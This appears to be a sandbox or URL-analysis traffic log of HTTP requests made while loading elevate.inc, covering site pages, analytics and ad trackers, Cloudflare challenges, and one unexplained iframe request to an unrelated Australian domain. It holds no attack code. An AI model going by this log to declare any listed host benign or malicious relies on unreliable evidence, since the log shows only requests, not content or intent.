                    Source: global trafficHTTP traffic detected: GET /component-parts HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /use-cases/financial-institutions HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /use-cases/third-party-administrators HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /use-cases/health-plans HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /use-cases/peo-software HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /why-elevate HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /blog HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /resource-center HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /login HTTP/1.1host: user.elevateaccounts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /our-story HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9if-modified-since: Thu, 05 Jun 2025 21:46:58 GMTpriority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /press HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /request-a-demo HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /js/optimize.js?key=w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /fb.js HTTP/1.1host: js.hsadspixel.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /v2/19524073/banner.js HTTP/1.1host: js.hs-banner.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /analytics/1749240900000/19524073.js HTTP/1.1host: js.hs-analytics.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1host: js.hscollectedforms.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/index.html HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/00zbo/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                    Source: global trafficHTTP traffic detected: GET /video/901646435?app_id=122963&referrer=https%3A%2F%2Fwww.elevate.inc%2F HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://cdn.embedly.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/00zbo/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /li.lms-analytics/insight.min.js HTTP/1.1host: snap.licdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94ba9a6f4b2ee766&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/00zbo/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /tag/qcbwstkzrz?ref=gtm2 HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /js/mida-integration.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /td/rul/11308007612?random=1749241150624&cv=11&fst=1749241150624&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframe
                    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=turnstileLoad HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749241150624&cv=11&fst=1749241150624&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749241151096&cv=11&fst=1749241151096&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /js/mida-event.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /td/rul/11308007612?random=1749241151096&cv=11&fst=1749241151096&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: 